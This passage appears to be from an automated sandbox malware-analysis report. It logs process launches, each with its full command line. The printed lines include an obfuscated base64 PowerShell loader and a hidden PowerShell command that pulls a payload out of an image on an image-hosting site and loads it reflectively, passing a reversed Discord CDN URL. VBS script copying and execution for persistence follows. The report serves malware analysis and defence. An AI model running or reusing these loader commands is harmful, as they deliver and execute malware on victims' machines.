reaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreODgTreDgTreyDgTreDEDgTreZQBjDgTreGEDgTreMQDgTrewDgTreDYDgTreOQDgTre3DgTreGEDgTreMDgTreBjDgTreDYDgTreNwBkDgTreGYDgTreMgBlDgTreDYDgTreNwBiDgTreGUDgTreZgDgTre3DgTreDQDgTreZQDgTre5DgTreDgDgTreODgTreDgTreyDgTreDYDgTreMDgTreDgTrezDgTreDgDgTreNQDgTre3DgTreGUDgTreYQDgTre0DgTreDUDgTreODgTreBmDgTreGYDgTreOQDgTre1DgTreDkDgTreZDgTreBhDgTreGEDgTreYwDgTrewDgTreDYDgTreYwBlDgTreGYDgTreMQBlDgTreDDgTreDgTreZgDgTre0DgTreDIDgTreZQDgTre9DgTreG0DgTreaDgTreDgTremDgTreGQDgTreZQDgTrewDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGQDgTreNgDgTreyDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTreZDgTreBhDgTreG8DgTrebDgTreBwDgTreHUDgTreLwDgTreyDgTreDYDgTreMwDgTre3DgTreDgDgTreOQDgTrexDgTreDMDgTreMDgTreDgTrezDgTreDEDgTreNQDgTre5DgTreDEDgTreNgDgTrezDgTreDQDgTreMgDgTrexDgTreC8DgTreMwDgTre0DgTreDYDgTreMQDgTre5DgTreDEDgTreMQDgTrexDgTreDUDgTreMwDgTreyDgTreDDgTreDgTreNwDgTreyDgTreDYDgTreNQDgTrezDgTreDIDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGMDgTrebwBnDgTreG4DgTreaQB0DgTreGkDgTredgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
        Imagebase:0x7ff7be880000
        File size:452'608 bytes
        MD5 hash:04029E121A0CFA5991749937DD22A1D9
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:3
        Start time:09:20:58
        Start date:27/05/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6d64d0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:4
        Start time:09:21:00
        Start date:27/05/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
        Imagebase:0x7ff7be880000
        File size:452'608 bytes
        MD5 hash:04029E121A0CFA5991749937DD22A1D9
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:6
        Start time:09:21:15
        Start date:27/05/2024
        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
        Imagebase:0x7ff7be880000
        File size:452'608 bytes
        MD5 hash:04029E121A0CFA5991749937DD22A1D9
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:7
        Start time:09:21:15
        Start date:27/05/2024
        Path:C:\Windows\System32\conhost.exe
        Wow64 process (32bit):false
        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Imagebase:0x7ff6d64d0000
        File size:862'208 bytes
        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:8
        Start time:09:21:27
        Start date:27/05/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
        Imagebase:0x7ff67e450000
        File size:170'496 bytes
        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Target ID:9
        Start time:09:21:35
        Start date:27/05/2024
        Path:C:\Windows\System32\wscript.exe
        Wow64 process (32bit):false
        Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
        Imagebase:0x7ff67e450000
        File size:170'496 bytes
        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
        Has elevated privileges:false
        Has administrator privileges:false
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:true

        Reset < >
          Memory Dump Source
          • Source File: 00000002.00000002.2616370279.00007FF848D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D00000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_2_2_7ff848d00000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
          • Instruction ID: 2da2acc551757e0a571743a8a402bc2778ad2de156ad5e19b6d4e1f5af17e6c8
          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
          • Instruction Fuzzy Hash: 5E01447111CB094FD748EF0CE451AA6B7E0FB95364F10056DE58AC3655D726E882CB45
          Memory Dump Source
          • Source File: 00000006.00000002.2207655850.00007FF848D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D20000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_6_2_7ff848d20000_powershell.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
          • Instruction ID: 66106b110433abdb55bee002d3b51bb9ae4c556eed9bfe1162204927c8de11b7
          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
          • Instruction Fuzzy Hash: B401447111CB084FD748EF0CE451AA5B7E0FB95364F10056DE58AC3665DB26E892CB46